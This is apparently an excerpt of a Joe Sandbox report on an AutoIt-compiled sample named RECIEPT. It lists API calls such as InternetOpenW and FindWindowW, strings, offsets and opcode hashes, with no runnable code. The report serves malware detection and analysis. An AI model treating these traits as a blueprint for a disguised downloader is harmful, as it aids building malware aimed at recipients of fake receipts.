                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \
                                        • API String ID: 4104443479-2967466578
                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                        APIs
                                        • _wcslen.LIBCMT ref: 00466825
                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                        APIs
                                        • _strlen.LIBCMT ref: 0040F858
                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                        • _sprintf.LIBCMT ref: 0040F9AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove$_sprintf_strlen
                                        • String ID: %02X
                                        • API String ID: 1921645428-436463671
                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: <local>
                                        • API String ID: 2038078732-4266983199
                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: u,D
                                        • API String ID: 4104443479-3858472334
                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                        APIs
                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • wsprintfW.USER32 ref: 0045612A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend_mallocwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 1262938277-328681919
                                        • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                        • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                        • InternetCloseHandle.WININET ref: 00442668
                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                        • String ID: aeB
                                        • API String ID: 857135153-906807131
                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D